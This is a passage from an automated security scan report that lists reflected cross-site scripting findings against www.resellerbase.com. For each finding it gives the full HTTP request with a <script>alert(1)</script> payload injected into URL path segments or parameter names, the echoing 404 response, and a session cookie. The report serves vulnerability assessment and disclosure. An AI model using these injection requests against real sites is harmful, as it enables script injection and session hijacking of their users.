Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5cead<script>alert(1)</script>0bc52c6d8d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes5cead<script>alert(1)</script>0bc52c6d8d5/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes5cead<script>alert(1)</script>0bc52c6d8d5/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5152. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d70da<script>alert(1)</script>b8df7866d3d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmosd70da<script>alert(1)</script>b8df7866d3d/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmosd70da<script>alert(1)</script>b8df7866d3d/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5153. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8c542<script>alert(1)</script>3c23b5f87cf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images8c542<script>alert(1)</script>3c23b5f87cf/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images8c542<script>alert(1)</script>3c23b5f87cf/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5154. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 969cc<script>alert(1)</script>70aad6c19db was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating969cc<script>alert(1)</script>70aad6c19db/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating969cc<script>alert(1)</script>70aad6c19db/0.gif was not found on this server.</p>
...[SNIP]...

2.5155. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6003e<script>alert(1)</script>4ff981d0da3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/0.gif6003e<script>alert(1)</script>4ff981d0da3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/0.gif6003e<script>alert(1)</script>4ff981d0da3 was not found on this server.</p>
...[SNIP]...

2.5156. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59d55<script>alert(1)</script>73c8f7da9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/0.gif?59d55<script>alert(1)</script>73c8f7da9b9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/0.gif?59d55<script>alert(1)</script>73c8f7da9b9=1 was not found on this server.</p>
...[SNIP]...

2.5157. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3af6d<script>alert(1)</script>53585c243ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3af6d<script>alert(1)</script>53585c243ba/other/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3af6d<script>alert(1)</script>53585c243ba/other/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5158. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36683<script>alert(1)</script>74c03b9101f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other36683<script>alert(1)</script>74c03b9101f/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other36683<script>alert(1)</script>74c03b9101f/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5159. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c3753<script>alert(1)</script>af6a1ade10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesc3753<script>alert(1)</script>af6a1ade10/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesc3753<script>alert(1)</script>af6a1ade10/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5160. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 927c5<script>alert(1)</script>4d249f5e933 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos927c5<script>alert(1)</script>4d249f5e933/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos927c5<script>alert(1)</script>4d249f5e933/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5161. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 37cde<script>alert(1)</script>f73e4a9bacb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images37cde<script>alert(1)</script>f73e4a9bacb/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images37cde<script>alert(1)</script>f73e4a9bacb/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5162. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1e666<script>alert(1)</script>cd81e598e84 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating1e666<script>alert(1)</script>cd81e598e84/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating1e666<script>alert(1)</script>cd81e598e84/3.gif was not found on this server.</p>
...[SNIP]...

2.5163. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8495f<script>alert(1)</script>d00b737739b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/3.gif8495f<script>alert(1)</script>d00b737739b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/3.gif8495f<script>alert(1)</script>d00b737739b was not found on this server.</p>
...[SNIP]...

2.5164. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 28c13<script>alert(1)</script>a20e9d49670 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/3.gif?28c13<script>alert(1)</script>a20e9d49670=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/3.gif?28c13<script>alert(1)</script>a20e9d49670=1 was not found on this server.</p>
...[SNIP]...

2.5165. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d7366<script>alert(1)</script>2d38b550ba6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced7366<script>alert(1)</script>2d38b550ba6/other/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced7366<script>alert(1)</script>2d38b550ba6/other/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5166. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 605ad<script>alert(1)</script>143d813b2db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other605ad<script>alert(1)</script>143d813b2db/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other605ad<script>alert(1)</script>143d813b2db/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5167. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5cac4<script>alert(1)</script>e142e449d3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes5cac4<script>alert(1)</script>e142e449d3e/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes5cac4<script>alert(1)</script>e142e449d3e/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5168. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8ac28<script>alert(1)</script>007929e17d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos8ac28<script>alert(1)</script>007929e17d2/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos8ac28<script>alert(1)</script>007929e17d2/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5169. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 287b1<script>alert(1)</script>19ca3e5c80c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images287b1<script>alert(1)</script>19ca3e5c80c/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images287b1<script>alert(1)</script>19ca3e5c80c/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5170. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b22c8<script>alert(1)</script>aaf115546fc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

